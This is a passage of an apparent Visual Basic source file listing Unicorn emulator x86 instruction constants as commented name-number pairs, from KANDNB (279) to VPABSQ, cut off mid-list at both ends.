' UC_X86_INS_KANDNB = 279 ' UC_X86_INS_KANDND = 280 ' UC_X86_INS_KANDNQ = 281 ' UC_X86_INS_KANDNW = 282 ' UC_X86_INS_KANDQ = 283 ' UC_X86_INS_KANDW = 284 ' UC_X86_INS_KMOVB = 285 ' UC_X86_INS_KMOVD = 286 ' UC_X86_INS_KMOVQ = 287 ' UC_X86_INS_KMOVW = 288 ' UC_X86_INS_KNOTB = 289 ' UC_X86_INS_KNOTD = 290 ' UC_X86_INS_KNOTQ = 291 ' UC_X86_INS_KNOTW = 292 ' UC_X86_INS_KORB = 293 ' UC_X86_INS_KORD = 294 ' UC_X86_INS_KORQ = 295 ' UC_X86_INS_KORTESTB = 296 ' UC_X86_INS_KORTESTD = 297 ' UC_X86_INS_KORTESTQ = 298 ' UC_X86_INS_KORTESTW = 299 ' UC_X86_INS_KORW = 300 ' UC_X86_INS_KSHIFTLB = 301 ' UC_X86_INS_KSHIFTLD = 302 ' UC_X86_INS_KSHIFTLQ = 303 ' UC_X86_INS_KSHIFTLW = 304 ' UC_X86_INS_KSHIFTRB = 305 ' UC_X86_INS_KSHIFTRD = 306 ' UC_X86_INS_KSHIFTRQ = 307 ' UC_X86_INS_KSHIFTRW = 308 ' UC_X86_INS_KUNPCKBW = 309 ' UC_X86_INS_KXNORB = 310 ' UC_X86_INS_KXNORD = 311 ' UC_X86_INS_KXNORQ = 312 ' UC_X86_INS_KXNORW = 313 ' UC_X86_INS_KXORB = 314 ' UC_X86_INS_KXORD = 315 ' UC_X86_INS_KXORQ = 316 ' UC_X86_INS_KXORW = 317 ' UC_X86_INS_LAHF = 318 ' UC_X86_INS_LAR = 319 ' UC_X86_INS_LDDQU = 320 ' UC_X86_INS_LDMXCSR = 321 ' UC_X86_INS_LDS = 322 ' UC_X86_INS_FLDZ = 323 ' UC_X86_INS_FLD1 = 324 ' UC_X86_INS_FLD = 325 ' UC_X86_INS_LEA = 326 ' UC_X86_INS_LEAVE = 327 ' UC_X86_INS_LES = 328 ' UC_X86_INS_LFENCE = 329 ' UC_X86_INS_LFS = 330 ' UC_X86_INS_LGDT = 331 ' UC_X86_INS_LGS = 332 ' UC_X86_INS_LIDT = 333 ' UC_X86_INS_LLDT = 334 ' UC_X86_INS_LMSW = 335 ' UC_X86_INS_OR = 336 ' UC_X86_INS_SUB = 337 ' UC_X86_INS_XOR = 338 ' UC_X86_INS_LODSB = 339 ' UC_X86_INS_LODSD = 340 ' UC_X86_INS_LODSQ = 341 ' UC_X86_INS_LODSW = 342 ' UC_X86_INS_LOOP = 343 ' UC_X86_INS_LOOPE = 344 ' UC_X86_INS_LOOPNE = 345 ' UC_X86_INS_RETF = 346 ' UC_X86_INS_RETFQ = 347 ' UC_X86_INS_LSL = 348 ' UC_X86_INS_LSS = 349 ' UC_X86_INS_LTR = 350 ' UC_X86_INS_XADD = 351 ' UC_X86_INS_LZCNT = 352 ' UC_X86_INS_MASKMOVDQU = 353 ' UC_X86_INS_MAXPD = 354 ' UC_X86_INS_MAXPS = 355 ' UC_X86_INS_MAXSD = 356 ' UC_X86_INS_MAXSS = 357 ' UC_X86_INS_MFENCE = 358 ' UC_X86_INS_MINPD = 359 ' UC_X86_INS_MINPS = 360 ' UC_X86_INS_MINSD = 361 ' UC_X86_INS_MINSS = 362 ' UC_X86_INS_CVTPD2PI = 363 ' UC_X86_INS_CVTPI2PD = 364 ' UC_X86_INS_CVTPI2PS = 365 ' UC_X86_INS_CVTPS2PI = 366 ' UC_X86_INS_CVTTPD2PI = 367 ' UC_X86_INS_CVTTPS2PI = 368 ' UC_X86_INS_EMMS = 369 ' UC_X86_INS_MASKMOVQ = 370 ' UC_X86_INS_MOVD = 371 ' UC_X86_INS_MOVDQ2Q = 372 ' UC_X86_INS_MOVNTQ = 373 ' UC_X86_INS_MOVQ2DQ = 374 ' UC_X86_INS_MOVQ = 375 ' UC_X86_INS_PABSB = 376 ' UC_X86_INS_PABSD = 377 ' UC_X86_INS_PABSW = 378 ' UC_X86_INS_PACKSSDW = 379 ' UC_X86_INS_PACKSSWB = 380 ' UC_X86_INS_PACKUSWB = 381 ' UC_X86_INS_PADDB = 382 ' UC_X86_INS_PADDD = 383 ' UC_X86_INS_PADDQ = 384 ' UC_X86_INS_PADDSB = 385 ' UC_X86_INS_PADDSW = 386 ' UC_X86_INS_PADDUSB = 387 ' UC_X86_INS_PADDUSW = 388 ' UC_X86_INS_PADDW = 389 ' UC_X86_INS_PALIGNR = 390 ' UC_X86_INS_PANDN = 391 ' UC_X86_INS_PAND = 392 ' UC_X86_INS_PAVGB = 393 ' UC_X86_INS_PAVGW = 394 ' UC_X86_INS_PCMPEQB = 395 ' UC_X86_INS_PCMPEQD = 396 ' UC_X86_INS_PCMPEQW = 397 ' UC_X86_INS_PCMPGTB = 398 ' UC_X86_INS_PCMPGTD = 399 ' UC_X86_INS_PCMPGTW = 400 ' UC_X86_INS_PEXTRW = 401 ' UC_X86_INS_PHADDSW = 402 ' UC_X86_INS_PHADDW = 403 ' UC_X86_INS_PHADDD = 404 ' UC_X86_INS_PHSUBD = 405 ' UC_X86_INS_PHSUBSW = 406 ' UC_X86_INS_PHSUBW = 407 ' UC_X86_INS_PINSRW = 408 ' UC_X86_INS_PMADDUBSW = 409 ' UC_X86_INS_PMADDWD = 410 ' UC_X86_INS_PMAXSW = 411 ' UC_X86_INS_PMAXUB = 412 ' UC_X86_INS_PMINSW = 413 ' UC_X86_INS_PMINUB = 414 ' UC_X86_INS_PMOVMSKB = 415 ' UC_X86_INS_PMULHRSW = 416 ' UC_X86_INS_PMULHUW = 417 ' UC_X86_INS_PMULHW = 418 ' UC_X86_INS_PMULLW = 419 ' UC_X86_INS_PMULUDQ = 420 ' UC_X86_INS_POR = 421 ' UC_X86_INS_PSADBW = 422 ' UC_X86_INS_PSHUFB = 423 ' UC_X86_INS_PSHUFW = 424 ' UC_X86_INS_PSIGNB = 425 ' UC_X86_INS_PSIGND = 426 ' UC_X86_INS_PSIGNW = 427 ' UC_X86_INS_PSLLD = 428 ' UC_X86_INS_PSLLQ = 429 ' UC_X86_INS_PSLLW = 430 ' UC_X86_INS_PSRAD = 431 ' UC_X86_INS_PSRAW = 432 ' UC_X86_INS_PSRLD = 433 ' UC_X86_INS_PSRLQ = 434 ' UC_X86_INS_PSRLW = 435 ' UC_X86_INS_PSUBB = 436 ' UC_X86_INS_PSUBD = 437 ' UC_X86_INS_PSUBQ = 438 ' UC_X86_INS_PSUBSB = 439 ' UC_X86_INS_PSUBSW = 440 ' UC_X86_INS_PSUBUSB = 441 ' UC_X86_INS_PSUBUSW = 442 ' UC_X86_INS_PSUBW = 443 ' UC_X86_INS_PUNPCKHBW = 444 ' UC_X86_INS_PUNPCKHDQ = 445 ' UC_X86_INS_PUNPCKHWD = 446 ' UC_X86_INS_PUNPCKLBW = 447 ' UC_X86_INS_PUNPCKLDQ = 448 ' UC_X86_INS_PUNPCKLWD = 449 ' UC_X86_INS_PXOR = 450 ' UC_X86_INS_MONITOR = 451 ' UC_X86_INS_MONTMUL = 452 ' UC_X86_INS_MOV = 453 ' UC_X86_INS_MOVABS = 454 ' UC_X86_INS_MOVBE = 455 ' UC_X86_INS_MOVDDUP = 456 ' UC_X86_INS_MOVDQA = 457 ' UC_X86_INS_MOVDQU = 458 ' UC_X86_INS_MOVHLPS = 459 ' UC_X86_INS_MOVHPD = 460 ' UC_X86_INS_MOVHPS = 461 ' UC_X86_INS_MOVLHPS = 462 ' UC_X86_INS_MOVLPD = 463 ' UC_X86_INS_MOVLPS = 464 ' UC_X86_INS_MOVMSKPD = 465 ' UC_X86_INS_MOVMSKPS = 466 ' UC_X86_INS_MOVNTDQA = 467 ' UC_X86_INS_MOVNTDQ = 468 ' UC_X86_INS_MOVNTI = 469 ' UC_X86_INS_MOVNTPD = 470 ' UC_X86_INS_MOVNTPS = 471 ' UC_X86_INS_MOVNTSD = 472 ' UC_X86_INS_MOVNTSS = 473 ' UC_X86_INS_MOVSB = 474 ' UC_X86_INS_MOVSD = 475 ' UC_X86_INS_MOVSHDUP = 476 ' UC_X86_INS_MOVSLDUP = 477 ' UC_X86_INS_MOVSQ = 478 ' UC_X86_INS_MOVSS = 479 ' UC_X86_INS_MOVSW = 480 ' UC_X86_INS_MOVSX = 481 ' UC_X86_INS_MOVSXD = 482 ' UC_X86_INS_MOVUPD = 483 ' UC_X86_INS_MOVUPS = 484 ' UC_X86_INS_MOVZX = 485 ' UC_X86_INS_MPSADBW = 486 ' UC_X86_INS_MUL = 487 ' UC_X86_INS_MULPD = 488 ' UC_X86_INS_MULPS = 489 ' UC_X86_INS_MULSD = 490 ' UC_X86_INS_MULSS = 491 ' UC_X86_INS_MULX = 492 ' UC_X86_INS_FMUL = 493 ' UC_X86_INS_FIMUL = 494 ' UC_X86_INS_FMULP = 495 ' UC_X86_INS_MWAIT = 496 ' UC_X86_INS_NEG = 497 ' UC_X86_INS_NOP = 498 ' UC_X86_INS_NOT = 499 ' UC_X86_INS_OUT = 500 ' UC_X86_INS_OUTSB = 501 ' UC_X86_INS_OUTSD = 502 ' UC_X86_INS_OUTSW = 503 ' UC_X86_INS_PACKUSDW = 504 ' UC_X86_INS_PAUSE = 505 ' UC_X86_INS_PAVGUSB = 506 ' UC_X86_INS_PBLENDVB = 507 ' UC_X86_INS_PBLENDW = 508 ' UC_X86_INS_PCLMULQDQ = 509 ' UC_X86_INS_PCMPEQQ = 510 ' UC_X86_INS_PCMPESTRI = 511 ' UC_X86_INS_PCMPESTRM = 512 ' UC_X86_INS_PCMPGTQ = 513 ' UC_X86_INS_PCMPISTRI = 514 ' UC_X86_INS_PCMPISTRM = 515 ' UC_X86_INS_PCOMMIT = 516 ' UC_X86_INS_PDEP = 517 ' UC_X86_INS_PEXT = 518 ' UC_X86_INS_PEXTRB = 519 ' UC_X86_INS_PEXTRD = 520 ' UC_X86_INS_PEXTRQ = 521 ' UC_X86_INS_PF2ID = 522 ' UC_X86_INS_PF2IW = 523 ' UC_X86_INS_PFACC = 524 ' UC_X86_INS_PFADD = 525 ' UC_X86_INS_PFCMPEQ = 526 ' UC_X86_INS_PFCMPGE = 527 ' UC_X86_INS_PFCMPGT = 528 ' UC_X86_INS_PFMAX = 529 ' UC_X86_INS_PFMIN = 530 ' UC_X86_INS_PFMUL = 531 ' UC_X86_INS_PFNACC = 532 ' UC_X86_INS_PFPNACC = 533 ' UC_X86_INS_PFRCPIT1 = 534 ' UC_X86_INS_PFRCPIT2 = 535 ' UC_X86_INS_PFRCP = 536 ' UC_X86_INS_PFRSQIT1 = 537 ' UC_X86_INS_PFRSQRT = 538 ' UC_X86_INS_PFSUBR = 539 ' UC_X86_INS_PFSUB = 540 ' UC_X86_INS_PHMINPOSUW = 541 ' UC_X86_INS_PI2FD = 542 ' UC_X86_INS_PI2FW = 543 ' UC_X86_INS_PINSRB = 544 ' UC_X86_INS_PINSRD = 545 ' UC_X86_INS_PINSRQ = 546 ' UC_X86_INS_PMAXSB = 547 ' UC_X86_INS_PMAXSD = 548 ' UC_X86_INS_PMAXUD = 549 ' UC_X86_INS_PMAXUW = 550 ' UC_X86_INS_PMINSB = 551 ' UC_X86_INS_PMINSD = 552 ' UC_X86_INS_PMINUD = 553 ' UC_X86_INS_PMINUW = 554 ' UC_X86_INS_PMOVSXBD = 555 ' UC_X86_INS_PMOVSXBQ = 556 ' UC_X86_INS_PMOVSXBW = 557 ' UC_X86_INS_PMOVSXDQ = 558 ' UC_X86_INS_PMOVSXWD = 559 ' UC_X86_INS_PMOVSXWQ = 560 ' UC_X86_INS_PMOVZXBD = 561 ' UC_X86_INS_PMOVZXBQ = 562 ' UC_X86_INS_PMOVZXBW = 563 ' UC_X86_INS_PMOVZXDQ = 564 ' UC_X86_INS_PMOVZXWD = 565 ' UC_X86_INS_PMOVZXWQ = 566 ' UC_X86_INS_PMULDQ = 567 ' UC_X86_INS_PMULHRW = 568 ' UC_X86_INS_PMULLD = 569 ' UC_X86_INS_POP = 570 ' UC_X86_INS_POPAW = 571 ' UC_X86_INS_POPAL = 572 ' UC_X86_INS_POPCNT = 573 ' UC_X86_INS_POPF = 574 ' UC_X86_INS_POPFD = 575 ' UC_X86_INS_POPFQ = 576 ' UC_X86_INS_PREFETCH = 577 ' UC_X86_INS_PREFETCHNTA = 578 ' UC_X86_INS_PREFETCHT0 = 579 ' UC_X86_INS_PREFETCHT1 = 580 ' UC_X86_INS_PREFETCHT2 = 581 ' UC_X86_INS_PREFETCHW = 582 ' UC_X86_INS_PSHUFD = 583 ' UC_X86_INS_PSHUFHW = 584 ' UC_X86_INS_PSHUFLW = 585 ' UC_X86_INS_PSLLDQ = 586 ' UC_X86_INS_PSRLDQ = 587 ' UC_X86_INS_PSWAPD = 588 ' UC_X86_INS_PTEST = 589 ' UC_X86_INS_PUNPCKHQDQ = 590 ' UC_X86_INS_PUNPCKLQDQ = 591 ' UC_X86_INS_PUSH = 592 ' UC_X86_INS_PUSHAW = 593 ' UC_X86_INS_PUSHAL = 594 ' UC_X86_INS_PUSHF = 595 ' UC_X86_INS_PUSHFD = 596 ' UC_X86_INS_PUSHFQ = 597 ' UC_X86_INS_RCL = 598 ' UC_X86_INS_RCPPS = 599 ' UC_X86_INS_RCPSS = 600 ' UC_X86_INS_RCR = 601 ' UC_X86_INS_RDFSBASE = 602 ' UC_X86_INS_RDGSBASE = 603 ' UC_X86_INS_RDMSR = 604 ' UC_X86_INS_RDPMC = 605 ' UC_X86_INS_RDRAND = 606 ' UC_X86_INS_RDSEED = 607 ' UC_X86_INS_RDTSC = 608 ' UC_X86_INS_RDTSCP = 609 ' UC_X86_INS_ROL = 610 ' UC_X86_INS_ROR = 611 ' UC_X86_INS_RORX = 612 ' UC_X86_INS_ROUNDPD = 613 ' UC_X86_INS_ROUNDPS = 614 ' UC_X86_INS_ROUNDSD = 615 ' UC_X86_INS_ROUNDSS = 616 ' UC_X86_INS_RSM = 617 ' UC_X86_INS_RSQRTPS = 618 ' UC_X86_INS_RSQRTSS = 619 ' UC_X86_INS_SAHF = 620 ' UC_X86_INS_SAL = 621 ' UC_X86_INS_SALC = 622 ' UC_X86_INS_SAR = 623 ' UC_X86_INS_SARX = 624 ' UC_X86_INS_SBB = 625 ' UC_X86_INS_SCASB = 626 ' UC_X86_INS_SCASD = 627 ' UC_X86_INS_SCASQ = 628 ' UC_X86_INS_SCASW = 629 ' UC_X86_INS_SETAE = 630 ' UC_X86_INS_SETA = 631 ' UC_X86_INS_SETBE = 632 ' UC_X86_INS_SETB = 633 ' UC_X86_INS_SETE = 634 ' UC_X86_INS_SETGE = 635 ' UC_X86_INS_SETG = 636 ' UC_X86_INS_SETLE = 637 ' UC_X86_INS_SETL = 638 ' UC_X86_INS_SETNE = 639 ' UC_X86_INS_SETNO = 640 ' UC_X86_INS_SETNP = 641 ' UC_X86_INS_SETNS = 642 ' UC_X86_INS_SETO = 643 ' UC_X86_INS_SETP = 644 ' UC_X86_INS_SETS = 645 ' UC_X86_INS_SFENCE = 646 ' UC_X86_INS_SGDT = 647 ' UC_X86_INS_SHA1MSG1 = 648 ' UC_X86_INS_SHA1MSG2 = 649 ' UC_X86_INS_SHA1NEXTE = 650 ' UC_X86_INS_SHA1RNDS4 = 651 ' UC_X86_INS_SHA256MSG1 = 652 ' UC_X86_INS_SHA256MSG2 = 653 ' UC_X86_INS_SHA256RNDS2 = 654 ' UC_X86_INS_SHL = 655 ' UC_X86_INS_SHLD = 656 ' UC_X86_INS_SHLX = 657 ' UC_X86_INS_SHR = 658 ' UC_X86_INS_SHRD = 659 ' UC_X86_INS_SHRX = 660 ' UC_X86_INS_SHUFPD = 661 ' UC_X86_INS_SHUFPS = 662 ' UC_X86_INS_SIDT = 663 ' UC_X86_INS_FSIN = 664 ' UC_X86_INS_SKINIT = 665 ' UC_X86_INS_SLDT = 666 ' UC_X86_INS_SMSW = 667 ' UC_X86_INS_SQRTPD = 668 ' UC_X86_INS_SQRTPS = 669 ' UC_X86_INS_SQRTSD = 670 ' UC_X86_INS_SQRTSS = 671 ' UC_X86_INS_FSQRT = 672 ' UC_X86_INS_STAC = 673 ' UC_X86_INS_STC = 674 ' UC_X86_INS_STD = 675 ' UC_X86_INS_STGI = 676 ' UC_X86_INS_STI = 677 ' UC_X86_INS_STMXCSR = 678 ' UC_X86_INS_STOSB = 679 ' UC_X86_INS_STOSD = 680 ' UC_X86_INS_STOSQ = 681 ' UC_X86_INS_STOSW = 682 ' UC_X86_INS_STR = 683 ' UC_X86_INS_FST = 684 ' UC_X86_INS_FSTP = 685 ' UC_X86_INS_FSTPNCE = 686 ' UC_X86_INS_FXCH = 687 ' UC_X86_INS_SUBPD = 688 ' UC_X86_INS_SUBPS = 689 ' UC_X86_INS_FSUBR = 690 ' UC_X86_INS_FISUBR = 691 ' UC_X86_INS_FSUBRP = 692 ' UC_X86_INS_SUBSD = 693 ' UC_X86_INS_SUBSS = 694 ' UC_X86_INS_FSUB = 695 ' UC_X86_INS_FISUB = 696 ' UC_X86_INS_FSUBP = 697 ' UC_X86_INS_SWAPGS = 698 ' UC_X86_INS_SYSCALL = 699 ' UC_X86_INS_SYSENTER = 700 ' UC_X86_INS_SYSEXIT = 701 ' UC_X86_INS_SYSRET = 702 ' UC_X86_INS_T1MSKC = 703 ' UC_X86_INS_TEST = 704 ' UC_X86_INS_UD2 = 705 ' UC_X86_INS_FTST = 706 ' UC_X86_INS_TZCNT = 707 ' UC_X86_INS_TZMSK = 708 ' UC_X86_INS_FUCOMPI = 709 ' UC_X86_INS_FUCOMI = 710 ' UC_X86_INS_FUCOMPP = 711 ' UC_X86_INS_FUCOMP = 712 ' UC_X86_INS_FUCOM = 713 ' UC_X86_INS_UD2B = 714 ' UC_X86_INS_UNPCKHPD = 715 ' UC_X86_INS_UNPCKHPS = 716 ' UC_X86_INS_UNPCKLPD = 717 ' UC_X86_INS_UNPCKLPS = 718 ' UC_X86_INS_VADDPD = 719 ' UC_X86_INS_VADDPS = 720 ' UC_X86_INS_VADDSD = 721 ' UC_X86_INS_VADDSS = 722 ' UC_X86_INS_VADDSUBPD = 723 ' UC_X86_INS_VADDSUBPS = 724 ' UC_X86_INS_VAESDECLAST = 725 ' UC_X86_INS_VAESDEC = 726 ' UC_X86_INS_VAESENCLAST = 727 ' UC_X86_INS_VAESENC = 728 ' UC_X86_INS_VAESIMC = 729 ' UC_X86_INS_VAESKEYGENASSIST = 730 ' UC_X86_INS_VALIGND = 731 ' UC_X86_INS_VALIGNQ = 732 ' UC_X86_INS_VANDNPD = 733 ' UC_X86_INS_VANDNPS = 734 ' UC_X86_INS_VANDPD = 735 ' UC_X86_INS_VANDPS = 736 ' UC_X86_INS_VBLENDMPD = 737 ' UC_X86_INS_VBLENDMPS = 738 ' UC_X86_INS_VBLENDPD = 739 ' UC_X86_INS_VBLENDPS = 740 ' UC_X86_INS_VBLENDVPD = 741 ' UC_X86_INS_VBLENDVPS = 742 ' UC_X86_INS_VBROADCASTF128 = 743 ' UC_X86_INS_VBROADCASTI32X4 = 744 ' UC_X86_INS_VBROADCASTI64X4 = 745 ' UC_X86_INS_VBROADCASTSD = 746 ' UC_X86_INS_VBROADCASTSS = 747 ' UC_X86_INS_VCMPPD = 748 ' UC_X86_INS_VCMPPS = 749 ' UC_X86_INS_VCMPSD = 750 ' UC_X86_INS_VCMPSS = 751 ' UC_X86_INS_VCOMPRESSPD = 752 ' UC_X86_INS_VCOMPRESSPS = 753 ' UC_X86_INS_VCVTDQ2PD = 754 ' UC_X86_INS_VCVTDQ2PS = 755 ' UC_X86_INS_VCVTPD2DQX = 756 ' UC_X86_INS_VCVTPD2DQ = 757 ' UC_X86_INS_VCVTPD2PSX = 758 ' UC_X86_INS_VCVTPD2PS = 759 ' UC_X86_INS_VCVTPD2UDQ = 760 ' UC_X86_INS_VCVTPH2PS = 761 ' UC_X86_INS_VCVTPS2DQ = 762 ' UC_X86_INS_VCVTPS2PD = 763 ' UC_X86_INS_VCVTPS2PH = 764 ' UC_X86_INS_VCVTPS2UDQ = 765 ' UC_X86_INS_VCVTSD2SI = 766 ' UC_X86_INS_VCVTSD2USI = 767 ' UC_X86_INS_VCVTSS2SI = 768 ' UC_X86_INS_VCVTSS2USI = 769 ' UC_X86_INS_VCVTTPD2DQX = 770 ' UC_X86_INS_VCVTTPD2DQ = 771 ' UC_X86_INS_VCVTTPD2UDQ = 772 ' UC_X86_INS_VCVTTPS2DQ = 773 ' UC_X86_INS_VCVTTPS2UDQ = 774 ' UC_X86_INS_VCVTUDQ2PD = 775 ' UC_X86_INS_VCVTUDQ2PS = 776 ' UC_X86_INS_VDIVPD = 777 ' UC_X86_INS_VDIVPS = 778 ' UC_X86_INS_VDIVSD = 779 ' UC_X86_INS_VDIVSS = 780 ' UC_X86_INS_VDPPD = 781 ' UC_X86_INS_VDPPS = 782 ' UC_X86_INS_VERR = 783 ' UC_X86_INS_VERW = 784 ' UC_X86_INS_VEXP2PD = 785 ' UC_X86_INS_VEXP2PS = 786 ' UC_X86_INS_VEXPANDPD = 787 ' UC_X86_INS_VEXPANDPS = 788 ' UC_X86_INS_VEXTRACTF128 = 789 ' UC_X86_INS_VEXTRACTF32X4 = 790 ' UC_X86_INS_VEXTRACTF64X4 = 791 ' UC_X86_INS_VEXTRACTI128 = 792 ' UC_X86_INS_VEXTRACTI32X4 = 793 ' UC_X86_INS_VEXTRACTI64X4 = 794 ' UC_X86_INS_VEXTRACTPS = 795 ' UC_X86_INS_VFMADD132PD = 796 ' UC_X86_INS_VFMADD132PS = 797 ' UC_X86_INS_VFMADDPD = 798 ' UC_X86_INS_VFMADD213PD = 799 ' UC_X86_INS_VFMADD231PD = 800 ' UC_X86_INS_VFMADDPS = 801 ' UC_X86_INS_VFMADD213PS = 802 ' UC_X86_INS_VFMADD231PS = 803 ' UC_X86_INS_VFMADDSD = 804 ' UC_X86_INS_VFMADD213SD = 805 ' UC_X86_INS_VFMADD132SD = 806 ' UC_X86_INS_VFMADD231SD = 807 ' UC_X86_INS_VFMADDSS = 808 ' UC_X86_INS_VFMADD213SS = 809 ' UC_X86_INS_VFMADD132SS = 810 ' UC_X86_INS_VFMADD231SS = 811 ' UC_X86_INS_VFMADDSUB132PD = 812 ' UC_X86_INS_VFMADDSUB132PS = 813 ' UC_X86_INS_VFMADDSUBPD = 814 ' UC_X86_INS_VFMADDSUB213PD = 815 ' UC_X86_INS_VFMADDSUB231PD = 816 ' UC_X86_INS_VFMADDSUBPS = 817 ' UC_X86_INS_VFMADDSUB213PS = 818 ' UC_X86_INS_VFMADDSUB231PS = 819 ' UC_X86_INS_VFMSUB132PD = 820 ' UC_X86_INS_VFMSUB132PS = 821 ' UC_X86_INS_VFMSUBADD132PD = 822 ' UC_X86_INS_VFMSUBADD132PS = 823 ' UC_X86_INS_VFMSUBADDPD = 824 ' UC_X86_INS_VFMSUBADD213PD = 825 ' UC_X86_INS_VFMSUBADD231PD = 826 ' UC_X86_INS_VFMSUBADDPS = 827 ' UC_X86_INS_VFMSUBADD213PS = 828 ' UC_X86_INS_VFMSUBADD231PS = 829 ' UC_X86_INS_VFMSUBPD = 830 ' UC_X86_INS_VFMSUB213PD = 831 ' UC_X86_INS_VFMSUB231PD = 832 ' UC_X86_INS_VFMSUBPS = 833 ' UC_X86_INS_VFMSUB213PS = 834 ' UC_X86_INS_VFMSUB231PS = 835 ' UC_X86_INS_VFMSUBSD = 836 ' UC_X86_INS_VFMSUB213SD = 837 ' UC_X86_INS_VFMSUB132SD = 838 ' UC_X86_INS_VFMSUB231SD = 839 ' UC_X86_INS_VFMSUBSS = 840 ' UC_X86_INS_VFMSUB213SS = 841 ' UC_X86_INS_VFMSUB132SS = 842 ' UC_X86_INS_VFMSUB231SS = 843 ' UC_X86_INS_VFNMADD132PD = 844 ' UC_X86_INS_VFNMADD132PS = 845 ' UC_X86_INS_VFNMADDPD = 846 ' UC_X86_INS_VFNMADD213PD = 847 ' UC_X86_INS_VFNMADD231PD = 848 ' UC_X86_INS_VFNMADDPS = 849 ' UC_X86_INS_VFNMADD213PS = 850 ' UC_X86_INS_VFNMADD231PS = 851 ' UC_X86_INS_VFNMADDSD = 852 ' UC_X86_INS_VFNMADD213SD = 853 ' UC_X86_INS_VFNMADD132SD = 854 ' UC_X86_INS_VFNMADD231SD = 855 ' UC_X86_INS_VFNMADDSS = 856 ' UC_X86_INS_VFNMADD213SS = 857 ' UC_X86_INS_VFNMADD132SS = 858 ' UC_X86_INS_VFNMADD231SS = 859 ' UC_X86_INS_VFNMSUB132PD = 860 ' UC_X86_INS_VFNMSUB132PS = 861 ' UC_X86_INS_VFNMSUBPD = 862 ' UC_X86_INS_VFNMSUB213PD = 863 ' UC_X86_INS_VFNMSUB231PD = 864 ' UC_X86_INS_VFNMSUBPS = 865 ' UC_X86_INS_VFNMSUB213PS = 866 ' UC_X86_INS_VFNMSUB231PS = 867 ' UC_X86_INS_VFNMSUBSD = 868 ' UC_X86_INS_VFNMSUB213SD = 869 ' UC_X86_INS_VFNMSUB132SD = 870 ' UC_X86_INS_VFNMSUB231SD = 871 ' UC_X86_INS_VFNMSUBSS = 872 ' UC_X86_INS_VFNMSUB213SS = 873 ' UC_X86_INS_VFNMSUB132SS = 874 ' UC_X86_INS_VFNMSUB231SS = 875 ' UC_X86_INS_VFRCZPD = 876 ' UC_X86_INS_VFRCZPS = 877 ' UC_X86_INS_VFRCZSD = 878 ' UC_X86_INS_VFRCZSS = 879 ' UC_X86_INS_VORPD = 880 ' UC_X86_INS_VORPS = 881 ' UC_X86_INS_VXORPD = 882 ' UC_X86_INS_VXORPS = 883 ' UC_X86_INS_VGATHERDPD = 884 ' UC_X86_INS_VGATHERDPS = 885 ' UC_X86_INS_VGATHERPF0DPD = 886 ' UC_X86_INS_VGATHERPF0DPS = 887 ' UC_X86_INS_VGATHERPF0QPD = 888 ' UC_X86_INS_VGATHERPF0QPS = 889 ' UC_X86_INS_VGATHERPF1DPD = 890 ' UC_X86_INS_VGATHERPF1DPS = 891 ' UC_X86_INS_VGATHERPF1QPD = 892 ' UC_X86_INS_VGATHERPF1QPS = 893 ' UC_X86_INS_VGATHERQPD = 894 ' UC_X86_INS_VGATHERQPS = 895 ' UC_X86_INS_VHADDPD = 896 ' UC_X86_INS_VHADDPS = 897 ' UC_X86_INS_VHSUBPD = 898 ' UC_X86_INS_VHSUBPS = 899 ' UC_X86_INS_VINSERTF128 = 900 ' UC_X86_INS_VINSERTF32X4 = 901 ' UC_X86_INS_VINSERTF32X8 = 902 ' UC_X86_INS_VINSERTF64X2 = 903 ' UC_X86_INS_VINSERTF64X4 = 904 ' UC_X86_INS_VINSERTI128 = 905 ' UC_X86_INS_VINSERTI32X4 = 906 ' UC_X86_INS_VINSERTI32X8 = 907 ' UC_X86_INS_VINSERTI64X2 = 908 ' UC_X86_INS_VINSERTI64X4 = 909 ' UC_X86_INS_VINSERTPS = 910 ' UC_X86_INS_VLDDQU = 911 ' UC_X86_INS_VLDMXCSR = 912 ' UC_X86_INS_VMASKMOVDQU = 913 ' UC_X86_INS_VMASKMOVPD = 914 ' UC_X86_INS_VMASKMOVPS = 915 ' UC_X86_INS_VMAXPD = 916 ' UC_X86_INS_VMAXPS = 917 ' UC_X86_INS_VMAXSD = 918 ' UC_X86_INS_VMAXSS = 919 ' UC_X86_INS_VMCALL = 920 ' UC_X86_INS_VMCLEAR = 921 ' UC_X86_INS_VMFUNC = 922 ' UC_X86_INS_VMINPD = 923 ' UC_X86_INS_VMINPS = 924 ' UC_X86_INS_VMINSD = 925 ' UC_X86_INS_VMINSS = 926 ' UC_X86_INS_VMLAUNCH = 927 ' UC_X86_INS_VMLOAD = 928 ' UC_X86_INS_VMMCALL = 929 ' UC_X86_INS_VMOVQ = 930 ' UC_X86_INS_VMOVDDUP = 931 ' UC_X86_INS_VMOVD = 932 ' UC_X86_INS_VMOVDQA32 = 933 ' UC_X86_INS_VMOVDQA64 = 934 ' UC_X86_INS_VMOVDQA = 935 ' UC_X86_INS_VMOVDQU16 = 936 ' UC_X86_INS_VMOVDQU32 = 937 ' UC_X86_INS_VMOVDQU64 = 938 ' UC_X86_INS_VMOVDQU8 = 939 ' UC_X86_INS_VMOVDQU = 940 ' UC_X86_INS_VMOVHLPS = 941 ' UC_X86_INS_VMOVHPD = 942 ' UC_X86_INS_VMOVHPS = 943 ' UC_X86_INS_VMOVLHPS = 944 ' UC_X86_INS_VMOVLPD = 945 ' UC_X86_INS_VMOVLPS = 946 ' UC_X86_INS_VMOVMSKPD = 947 ' UC_X86_INS_VMOVMSKPS = 948 ' UC_X86_INS_VMOVNTDQA = 949 ' UC_X86_INS_VMOVNTDQ = 950 ' UC_X86_INS_VMOVNTPD = 951 ' UC_X86_INS_VMOVNTPS = 952 ' UC_X86_INS_VMOVSD = 953 ' UC_X86_INS_VMOVSHDUP = 954 ' UC_X86_INS_VMOVSLDUP = 955 ' UC_X86_INS_VMOVSS = 956 ' UC_X86_INS_VMOVUPD = 957 ' UC_X86_INS_VMOVUPS = 958 ' UC_X86_INS_VMPSADBW = 959 ' UC_X86_INS_VMPTRLD = 960 ' UC_X86_INS_VMPTRST = 961 ' UC_X86_INS_VMREAD = 962 ' UC_X86_INS_VMRESUME = 963 ' UC_X86_INS_VMRUN = 964 ' UC_X86_INS_VMSAVE = 965 ' UC_X86_INS_VMULPD = 966 ' UC_X86_INS_VMULPS = 967 ' UC_X86_INS_VMULSD = 968 ' UC_X86_INS_VMULSS = 969 ' UC_X86_INS_VMWRITE = 970 ' UC_X86_INS_VMXOFF = 971 ' UC_X86_INS_VMXON = 972 ' UC_X86_INS_VPABSB = 973 ' UC_X86_INS_VPABSD = 974 ' UC_X86_INS_VPABSQ 